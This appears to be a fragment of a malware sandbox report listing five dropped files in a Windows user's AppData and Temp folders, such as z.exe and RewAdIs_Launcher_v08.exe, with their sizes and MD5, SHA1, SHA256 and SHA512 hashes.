C:\Users\Admin\AppData\Local\Microsoft\ISKA\u

Filesize
50B

MD5
9dec6bf4a0e0328e1f5b6e72d90f532a

SHA1
fd37287789abdd7b0ead4dd8a127ff6dcc2d024f

SHA256
9b3388c5db1a8a9b0905b2d3a6e8020adb67d038116498fbcd781d556188261d

SHA512
3e7551f2909f817a8a812347b0fe7fed3450f7fd438a11f26f191ade668f3e542086956e5a89b2b54d4c98eb8db27db7c84bbc412c2af2de8c8f9c1a895d175d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\z.exe

Filesize
543KB

MD5
2f58d2175bd282f29cb215275a18100f

SHA1
f7daad8646e9b633b9e57df43ec819d6e72c907c

SHA256
cf20cf85335562d6d62ba191614393f8da80664d3d6126c9fbaec9c7caadaaa2

SHA512
44ae15cada6b0823e0717a27dcfe2e4bd245184c0dd96961de7ff2eaabc3947fffb6fe86c9fb0f77e39fb81f0bf2a54f86206d9f7a267a05cee38525c65d54e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ndx

Filesize
25KB

MD5
71a1d73ec48592d096d5ffc72a8ad5f6

SHA1
db00d385af782e16c8f6730c8e6657c0a078dc95

SHA256
fb297d54bccfdf5c053b4b28fdf7563aa7d477774031b7d8f7aecc024c5e2df7

SHA512
e5ceb00b8664b1bdb6b9987b11b532b10e9ceda8d9328b8789e925f5e648cd0d2f8724db62753ab45bea3c5e5002d56864809a885aea8cd63ece7651776b1e0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\pcsw

Filesize
2B

MD5
88dba0c4e2af76447df43d1e31331a3d

SHA1
36f780fdbda5b2b2ce85c9ebb57086d1880ae757

SHA256
21d017c40a91c15748f0b98cd826ba445d2d3fe227e310bfd58dcb6c431826a0

SHA512
4c34894f42b47ee156997e54e03425f820a3aad6fe8c863d4a07b57c168e846db1a31d1230cec16643b9f1219c38e91331558842dd24a142fee381e465b751ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exe

Filesize
1.2MB

MD5
053487a5f68d7bb1a8fb36d07edef428

SHA1
799a6e4be54ad869319011380df12b6368024f08

SHA256
6c957cd9581d6c18df39a3b458ff6ac4d8b388cb7b66fb97ba4d314334493029

SHA512
f07722d73238226d04dad7f54b99c2f28f045d08b39d0e6133bd84a8d7316b6a84c07a2dfd2f1953c91744a036ed96f7944d8d0b638a9e7a264761096e31f18a

Download Submit